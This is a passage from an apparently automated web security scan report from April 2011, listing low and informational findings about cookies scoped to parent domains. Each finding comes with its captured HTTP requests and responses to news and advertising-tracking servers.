Cookie: __utmz=1.1303843206.1.1.utmcsr=money.msn.com|utmccn=(referral)|utmcmd=referral|utmcct=/taxes/; __utma=1.2122043951.1303843206.1303843206.1303843206.1; __utmc=1; __utmb=1.2.10.1303843206

Response

HTTP/1.1 200 OK
Content-Length: 29
Content-Type: application/x-javascript; charset=utf-8
Server: Microsoft-IIS/7.0
X-Bundle-Server: prod-app01
X-Bundle-Server: prod-web05
Vary: Accept-Encoding
Date: Tue, 26 Apr 2011 18:41:16 GMT
Connection: keep-alive
Set-Cookie: SESSIONID=h50b1r45qzwyxs34b22hzjzc; domain=.bundle.com; path=/; HttpOnly
Set-Cookie: GreetingName=; domain=.bundle.com; expires=Tue, 02-Jan-0001 00:00:00 GMT; path=/
Cache-Control: private, no-store, max-age=0
Cache-Control: private, no-store, max-age=0

var isLoggedInBundle = false;

13.2. http://www.computerworlduk.com/news/security/3276305/oracle-responds-to-hacker-group-and-patches-javacom-vulnerability/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.computerworlduk.com
Path:   /news/security/3276305/oracle-responds-to-hacker-group-and-patches-javacom-vulnerability/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /news/security/3276305/oracle-responds-to-hacker-group-and-patches-javacom-vulnerability/?olo=rss HTTP/1.1
Host: www.computerworlduk.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
Set-Cookie: JSESSIONID=6230266d0f7d1fe0d9aa114e2114b137a4f1;path=/
Set-Cookie: JSESSIONID=6230266d0f7d1fe0d9aa114e2114b137a4f1;domain=.computerworlduk.com;path=/
Date: Tue, 26 Apr 2011 21:49:09 GMT
Connection: close


       <!DOCTYPE html>
   <html>
       <head><script type="text/javascript">/* <![CDATA[ */_cf_loadingtexthtml="<img alt=' ' src='/CFIDE/scripts/ajax/resources/cf/images/loading.gif'/>";
_cf_contextpath=""
...[SNIP]...

13.3. http://a.rad.msn.com/ADSAdClient31.dll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.rad.msn.com
Path:   /ADSAdClient31.dll

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&ID=B506C07761D7465D924574124E3C14DF&MUID=B506C07761D7465D924574124E3C14DF&PG=REAR01&AP=1089 HTTP/1.1
Host: a.rad.msn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FC00=FB=; FC02=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC07=FB=; FC08=FB=; FC09=FB=; MC1=V=3&GUID=fdd1ad8ef8e24cf9bbad7ff7c197392d; mh=MSFT; CC=US; CULTURE=EN-US; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; FC01=FB=AgEAtg5ZB7AB; expid=id=79281a2784894bbe8e11de358b20f4da&bd=2011-04-23T14:00:24.831&v=2; MUID=B506C07761D7465D924574124E3C14DF; FC06=FB=AgEAtw4Q67gB; Sample=37

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 2313
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: FC01=FB=AgEAtw5ZB7gB; expires=Thu, 25-Apr-2013 12:00:00 GMT; domain=.rad.msn.com; path=/; HttpOnly
X-RADID: P8596567-T44582830-C59000000000042124
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Tue, 26 Apr 2011 18:39:19 GMT
Content-Length: 2313


//<![CDATA[
function getRADIds() { return{"adid":"59000000000042124","pid":"8596567","targetid":"44582830"};} if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 300, 250);if(pare
...[SNIP]...

13.4. http://a.rad.msn.com/ADSAdClient31.dll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.rad.msn.com
Path:   /ADSAdClient31.dll

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&ID=B506C07761D7465D924574124E3C14DF&MUID=B506C07761D7465D924574124E3C14DF&PG=INVNWS&AP=1089 HTTP/1.1
Host: a.rad.msn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FC00=FB=; FC02=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC06=FB=; FC07=FB=; FC08=FB=; FC09=FB=; MC1=V=3&GUID=fdd1ad8ef8e24cf9bbad7ff7c197392d; mh=MSFT; CC=US; CULTURE=EN-US; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; FC01=FB=AgEAtg5ZB7AB; expid=id=79281a2784894bbe8e11de358b20f4da&bd=2011-04-23T14:00:24.831&v=2; MUID=B506C07761D7465D924574124E3C14DF; Sample=37

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 2420
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: FC06=FB=AgEAtw4Q67gB; expires=Thu, 25-Apr-2013 12:00:00 GMT; domain=.rad.msn.com; path=/; HttpOnly
X-RADID: P8446885-T39837451-C29000000000076906
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Tue, 26 Apr 2011 18:35:55 GMT
Content-Length: 2420


//<![CDATA[
function getRADIds() { return{"adid":"29000000000076906","pid":"8446885","targetid":"39837451"};} if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 300, 250);if(pare
...[SNIP]...

13.5. http://a.rfihub.com/ca.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.rfihub.com
Path:   /ca.html

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ca.html?ra=8435996230.9279617241118103&rb=271&ca=1783&rc=10.2&rd=&ua=&ub=&uc=&ud=&ue=&pa=ppre8435996227678&pb=&pc=&pd=&pg=&ct=1303843599623 HTTP/1.1
Host: a.rfihub.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=1676624;type=count339;cat=landi852;u2=14610_0957_9_95;u4=38954353;u5=;u6=;u7=;ord=1;num=5058492012321.949?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: a1=1CAESEAcpLdw2F6J1UKMXA_aMRok; t=1303177639870; a2=2724386019227846218; t1=1303177640912; a=c614741349159218131; o=1-LUTRuF4-Pbpl; r=1303177638413; m="aAYCw2HtA==AI20473803AAABL25eZA0=AI20473803AAABL2uPV5g=AI20473803AAABL2uO-2o=AI20473803AAABL2uO0Aw=AI20473803AAABL2t9WLo=AI20473803AAABL2t7Sso=AI20473803AAABL2t7Ccw=AI20473803AAABL2t689Q=AI20473803AAABL2t5Lss=AI20473803AAABL2t4MZI=AI20473803AAABL2t4KCQ=AI20473803AAABL2t1-xQ=AI20473803AAABL2t1V3U=AI20473803AAABL2t1PoY=AI20473803AAABL2tyvMA=AI20473803AAABL2tynx8=AI20473803AAABL2tyZ9U=AI20473803AAABL2tyWc8=AI20473803AAABL2tyV4o=AI20473803AAABL2tyUIY=AI20473803AAABL2tyP8A=AI20473803AAABL2tyMOY=AI20473803AAABL2tyLJ0=AI20473803AAABL2twsg0="; u="aABWHF68w==AI89bBrQ==AAABL25eZA0="; f="aACMzXZKQ==AK1303226770AB1AAABL25eZA0=AK1303177638AC23AAABL2uPV5c="; k="aACM4yRNg==ALnca20473803AN1299695883000AAABL25eZA0=AM-nca20473803AN1299695883000AAABL2twsg0="; e=co

Response

HTTP/1.1 200 OK
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: b="aABHuDlYw==AC82AAABL5MiUls=";Path=/;Domain=.rfihub.com;Expires=Thu, 25-Oct-12 18:46:30 GMT
Set-Cookie: m="aAZi9tCwA==AE1783AAABL5MiUls=AI20473803AAABL25eZA0=AI20473803AAABL2uPV5g=AI20473803AAABL2uO-2o=AI20473803AAABL2uO0Aw=AI20473803AAABL2t9WLo=AI20473803AAABL2t7Sso=AI20473803AAABL2t7Ccw=AI20473803AAABL2t689Q=AI20473803AAABL2t5Lss=AI20473803AAABL2t4MZI=AI20473803AAABL2t4KCQ=AI20473803AAABL2t1-xQ=AI20473803AAABL2t1V3U=AI20473803AAABL2t1PoY=AI20473803AAABL2tyvMA=AI20473803AAABL2tynx8=AI20473803AAABL2tyZ9U=AI20473803AAABL2tyWc8=AI20473803AAABL2tyV4o=AI20473803AAABL2tyUIY=AI20473803AAABL2tyP8A=AI20473803AAABL2tyMOY=AI20473803AAABL2tyLJ0=AI20473803AAABL2twsg0=";Path=/;Domain=.rfihub.com;Expires=Thu, 25-Oct-12 18:46:30 GMT
Set-Cookie: u="aABIE89Tw==AI89bBrQ==AAABL5MiUls=";Path=/;Domain=.rfihub.com;Expires=Thu, 25-Oct-12 18:46:30 GMT
Set-Cookie: f="aADA1bk1g==AK1303843590AB1AAABL5MiUls=AK1303226770AB1AAABL25eZA0=AK1303177638AC23AAABL2uPV5c=";Path=/;Domain=.rfihub.com;Expires=Thu, 25-Oct-12 18:46:30 GMT
Set-Cookie: k="aADaAZB-w==AI-nca1783AN1303150295000AAABL5MiUls=ALnca20473803AN1299695883000AAABL25eZA0=AM-nca20473803AN1299695883000AAABL2twsg0=";Path=/;Domain=.rfihub.com;Expires=Thu, 25-Oct-12 18:46:30 GMT
Set-Cookie: e=cb;Path=/;Domain=.rfihub.com;Expires=Thu, 25-Oct-12 18:46:30 GMT
Cache-Control: no-cache
Content-Type: text/html; charset=iso-8859-1
Content-Length: 1050

<html><body><img src="http://pixel.rubiconproject.com/tap.php?v=4140" border="0"
width="1" height="1">
<img src='http://image2.pubmatic.com/AdServer/Pug?vcode=bz0xJnR5cGU9MSZjb2RlPTYxNyZ0bD0xNTc2ODAw
...[SNIP]...

13.6. http://a.rfihub.com/cm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.rfihub.com
Path:   /cm

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cm?apxuid=2724386019227846218&forward= HTTP/1.1
Host: a.rfihub.com
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/ca.html?ra=8435996260.2377219032496214&rb=271&ca=1783&rc=10.2&rd=&ua=&ub=&uc=&ud=&ue=&pa=ppre843599625685&pb=&pc=&pd=&pg=&ct=1303843599626
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: a1=1CAESEAcpLdw2F6J1UKMXA_aMRok; t=1303177639870; a2=2724386019227846218; t1=1303177640912; a=c614741349159218131; o=1-LUTRuF4-Pbpl; r=1303177638413; b="aABHuDlYw==AC82AAABL5MiUls="; m="aAZi9tCwA==AE1783AAABL5MiUls=AI20473803AAABL25eZA0=AI20473803AAABL2uPV5g=AI20473803AAABL2uO-2o=AI20473803AAABL2uO0Aw=AI20473803AAABL2t9WLo=AI20473803AAABL2t7Sso=AI20473803AAABL2t7Ccw=AI20473803AAABL2t689Q=AI20473803AAABL2t5Lss=AI20473803AAABL2t4MZI=AI20473803AAABL2t4KCQ=AI20473803AAABL2t1-xQ=AI20473803AAABL2t1V3U=AI20473803AAABL2t1PoY=AI20473803AAABL2tyvMA=AI20473803AAABL2tynx8=AI20473803AAABL2tyZ9U=AI20473803AAABL2tyWc8=AI20473803AAABL2tyV4o=AI20473803AAABL2tyUIY=AI20473803AAABL2tyP8A=AI20473803AAABL2tyMOY=AI20473803AAABL2tyLJ0=AI20473803AAABL2twsg0="; u="aABIE89Tw==AI89bBrQ==AAABL5MiUls="; f="aADA1bk1g==AK1303843590AB1AAABL5MiUls=AK1303226770AB1AAABL25eZA0=AK1303177638AC23AAABL2uPV5c="; k="aADaAZB-w==AI-nca1783AN1303150295000AAABL5MiUls=ALnca20473803AN1299695883000AAABL25eZA0=AM-nca20473803AN1299695883000AAABL2twsg0="; e=cb

Response

HTTP/1.1 200 OK
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: a2=2724386019227846218;Path=/;Domain=.rfihub.com;Expires=Mon, 21-Apr-31 18:46:52 GMT
Set-Cookie: j2=2724386019227846218;Path=/;Domain=.rfihub.com
Set-Cookie: t1=1303843612779;Path=/;Domain=.rfihub.com;Expires=Mon, 21-Apr-31 18:46:52 GMT
Set-Cookie: u="aABIFtszg==AI89bBrQ==AAABL5MiqGs=";Path=/;Domain=.rfihub.com;Expires=Thu, 25-Oct-12 18:46:52 GMT
Set-Cookie: e=cb;Path=/;Domain=.rfihub.com;Expires=Thu, 25-Oct-12 18:46:52 GMT
Set-Cookie: a=c614741349159218131;Path=/;Domain=.rfihub.com;Expires=Mon, 21-Apr-31 18:46:52 GMT
Set-Cookie: j=c614741349159218131;Path=/;Domain=.rfihub.com
Set-Cookie: o=1-LUTRuF4-Pbpl;Path=/;Domain=.rfihub.com;Expires=Mon, 21-Apr-31 18:46:52 GMT
Set-Cookie: p=1-LUTRuF4-Pbpl;Path=/;Domain=.rfihub.com
Set-Cookie: r=1303177638413;Path=/;Domain=.rfihub.com;Expires=Mon, 21-Apr-31 18:46:52 GMT
Content-Type: image/gif
Content-Length: 42

GIF89a.............!.......,........@..D.;

13.7. http://action.mathtag.com/mm//PHOE//lpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://action.mathtag.com
Path:   /mm//PHOE//lpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mm//PHOE//lpg?nm=LandngPg&s0=&s1=&s2=&v0=&v1=&v2=&ri=[RandomNumber] HTTP/1.1
Host: action.mathtag.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=1676624;type=count339;cat=landi852;u2=14610_0957_9_95;u4=38954353;u5=;u6=;u7=;ord=1;num=485052303411.0665?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; mt_mop=9:1303494339|3:1303506763|2:1303506773|5:1303494463|10001:1303152836|1:1303494357; ts=1303851733

Response

HTTP/1.1 200 OK
Server: mt2/2.0.17.4.1542 Apr 2 2011 16:34:52 ewr-pixel-n1a pid 0x6299 25241
Content-Type: image/gif
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Date: Tue, 26 Apr 2011 21:02:15 GMT
Etag: 4dab7d35-b1d2-915a-d3c0-9d57f9c66b07
Set-Cookie: ts=1303851735; domain=.mathtag.com; path=/; expires=Wed, 25-Apr-2012 21:02:15 GMT
Content-Length: 43
Accept-Ranges: bytes
Cache-Control: no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: Keep-Alive

GIF89a.............!.......,...........D..;

13.8. http://ad.doubleclick.net/click%3Bh%3Dv8/3af5/17/be/%2a/c%3B232789996%3B3-0%3B0%3B56669790%3B3454-728/90%3B38954353/38972110/2%3B%3B~sscs%3D%3fhttp://www.aptm.phoenix.edu/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /click%3Bh%3Dv8/3af5/17/be/%2a/c%3B232789996%3B3-0%3B0%3B56669790%3B3454-728/90%3B38954353/38972110/2%3B%3B~sscs%3D%3fhttp://www.aptm.phoenix.edu/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /click%3Bh%3Dv8/3af5/17/be/%2a/c%3B232789996%3B3-0%3B0%3B56669790%3B3454-728/90%3B38954353/38972110/2%3B%3B~sscs%3D%3fhttp://www.aptm.phoenix.edu/?creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf&provider=MSN&keyword=msn_careers_728x90_425006&user3=1&unit=dir&channel=banr&initiative=gen&mktg_prog=gen&placement=dsply&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&creative_id=38954353&pvp_campaign=14610_0957_9_95&cm_mmc=dir-_-banr-_-MSN-_-gen&cm_mmca1=gen&cm_mmca2=dsply&cm_mmca3=38954353&cm_mmca4=20DR_Button_Orange_728x90_F9_Tag_swf&cm_mmca5=728x90&cm_mmca6=dir_dsply&cm_mmca7=msn_careers_728x90_425006&cm_mmca8=aptm&cm_mmca9=plcmt_targ&cm_mmca11=cpm&cm_mmca12=dr&cm_mmca13=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://s0.2mdn.net/1676624/20DR_Button_Orange_728x90_F9_Tag.swf
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://www.aptm.phoenix.edu/?creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf&provider=MSN&keyword=msn_careers_728x90_425006&user3=1&unit=dir&channel=banr&initiative=gen&mktg_prog=gen&placement=dsply&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&creative_id=38954353&pvp_campaign=14610_0957_9_95&cm_mmc=dir-_-banr-_-MSN-_-gen&cm_mmca1=gen&cm_mmca2=dsply&cm_mmca3=38954353&cm_mmca4=20DR_Button_Orange_728x90_F9_Tag_swf&cm_mmca5=728x90&cm_mmca6=dir_dsply&cm_mmca7=msn_careers_728x90_425006&cm_mmca8=aptm&cm_mmca9=plcmt_targ&cm_mmca11=cpm&cm_mmca12=dr&cm_mmca13=1
Set-Cookie: id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; path=/; domain=.doubleclick.net; expires=Tue, 16 Apr 2013 20:37:40 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Tue, 26 Apr 2011 18:45:00 GMT
Server: GFE/2.0
Content-Type: text/html


13.9. http://ad.trafficmp.com/a/bpix  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.trafficmp.com
Path:   /a/bpix

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/bpix?adv=652&id=1561&format=image&r= HTTP/1.1
Host: ad.trafficmp.com
Proxy-Connection: keep-alive
Referer: http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=3306
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid2=470fb0bcf-3fea-4322-beeb-57f5828c5936-gmr873a3; T_1yvt=jxb%3Aafuq%3A1; rth=2-ljzkpb-jxb~afuq~1~1-eo7~861h~1~1-dlx~6ot5~1~1-7p9~0~1~1-

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: image/gif
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Tue, 26 Apr 2011 20:45:53 GMT
Connection: close
Set-Cookie: T_1yvt=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_57k0=jxb%3Aagz6%3A1; Domain=trafficmp.com; Expires=Wed, 25-Apr-2012 20:45:53 GMT; Path=/
Set-Cookie: rth=2-ljzkpb-jxb~agz6~1~1-eo7~861h~1~1-dlx~6ot5~1~1-7p9~0~1~1-; Domain=trafficmp.com; Expires=Wed, 25-Apr-2012 20:45:53 GMT; Path=/
Content-Length: 43

GIF89a.............!.......,...........D..;

13.10. http://ad.trafficmp.com/a/bpix  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.trafficmp.com
Path:   /a/bpix

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/bpix?adv=652&id=1561&format=image&r= HTTP/1.1
Host: ad.trafficmp.com
Proxy-Connection: keep-alive
Referer: http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=3306
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid2=470fb0bcf-3fea-4322-beeb-57f5828c5936-gmr873a3; T_9j36=jxb%3Aaftr%3A1; rth=2-ljzkpb-jxb~aftr~1~1-eo7~861h~1~1-dlx~6ot5~1~1-7p9~0~1~1-

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: image/gif
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Tue, 26 Apr 2011 20:35:58 GMT
Connection: close
Set-Cookie: T_9j36=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_g4xj=jxb%3Aagin%3A1; Domain=trafficmp.com; Expires=Wed, 25-Apr-2012 20:35:58 GMT; Path=/
Set-Cookie: rth=2-ljzkpb-jxb~agin~1~1-eo7~861h~1~1-dlx~6ot5~1~1-7p9~0~1~1-; Domain=trafficmp.com; Expires=Wed, 25-Apr-2012 20:35:58 GMT; Path=/
Content-Length: 43

GIF89a.............!.......,...........D..;

13.11. http://ad.trafficmp.com/a/bpix  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.trafficmp.com
Path:   /a/bpix

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/bpix?adv=652&id=1561&format=image&r= HTTP/1.1
Host: ad.trafficmp.com
Proxy-Connection: keep-alive
Referer: http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=3306
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid2=470fb0bcf-3fea-4322-beeb-57f5828c5936-gmr873a3; T_2o6=jxb%3Aag84%3A1; rth=2-ljzkpb-jxb~ag84~1~1-eo7~861h~1~1-dlx~6ot5~1~1-7p9~0~1~1-

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: image/gif
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Tue, 26 Apr 2011 23:13:29 GMT
Connection: close
Set-Cookie: T_2o6=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_7oga=jxb%3Aant7%3A1; Domain=trafficmp.com; Expires=Wed, 25-Apr-2012 23:13:30 GMT; Path=/
Set-Cookie: rth=2-ljzkpb-jxb~ant7~1~1-eo7~861h~1~1-dlx~6ot5~1~1-7p9~0~1~1-; Domain=trafficmp.com; Expires=Wed, 25-Apr-2012 23:13:30 GMT; Path=/
Content-Length: 43

GIF89a.............!.......,...........D..;

13.12. http://ad.trafficmp.com/a/bpix  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.trafficmp.com
Path:   /a/bpix

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/bpix?adv=652&id=1561&format=image&r= HTTP/1.1
Host: ad.trafficmp.com
Proxy-Connection: keep-alive
Referer: http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=3306
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid2=470fb0bcf-3fea-4322-beeb-57f5828c5936-gmr873a3; T_6mee=jxb%3Aaf0m%3A1; T_47z9=jxb%3Aaf0m%3A1; rth=2-ljzkpb-jxb~af0m~1~1-eo7~861h~1~1-dlx~6ot5~1~1-7p9~0~1~1-

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: image/gif
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Tue, 26 Apr 2011 20:35:51 GMT
Connection: close
Set-Cookie: T_6mee=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_47z9=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_ai3m=jxb%3Aagig%3A1; Domain=trafficmp.com; Expires=Wed, 25-Apr-2012 20:35:51 GMT; Path=/
Set-Cookie: rth=2-ljzkpb-jxb~agig~1~1-eo7~861h~1~1-dlx~6ot5~1~1-7p9~0~1~1-; Domain=trafficmp.com; Expires=Wed, 25-Apr-2012 20:35:51 GMT; Path=/
Content-Length: 43

GIF89a.............!.......,...........D..;

13.13. http://ad.trafficmp.com/a/bpix  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.trafficmp.com
Path:   /a/bpix

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/bpix?adv=652&id=1561&format=image&r= HTTP/1.1
Host: ad.trafficmp.com
Proxy-Connection: keep-alive
